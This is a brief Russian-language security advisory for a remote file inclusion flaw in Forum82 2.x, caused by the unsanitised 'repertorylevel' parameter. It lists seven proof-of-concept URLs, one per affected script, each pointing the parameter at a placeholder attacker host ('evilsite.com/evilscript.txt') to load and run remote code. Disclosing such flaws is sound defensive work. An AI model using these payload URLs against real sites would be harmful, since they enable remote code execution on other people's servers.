Хакер #305. Многошаговые SQL-инъекции
Программа: Forum82 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "repertorylevel" различными сценариями.
Примеры:
http://sitename.com/[Forum82_Installed_DIR]/forum/search.php? repertorylevel=http://evilsite.com/evilscript.txt?
http://sitename.com/[Forum82_Installed_DIR]/forum/message.php? repertorylevel=http://evilsite.com/evilscript.txt?
http://sitename.com/[Forum82_Installed_DIR]/forum/member.php? repertorylevel=http://evilsite.com/evilscript.txt?
http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php? repertorylevel=http://evilsite.com/evilscript.txt?
http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php? repertorylevel=http://evilsite.com/evilscript.txt?
http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php? repertorylevel=http://evilsite.com/evilscript.txt?
http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3? repertorylevel=http://evilsite.com/evilscript.txt?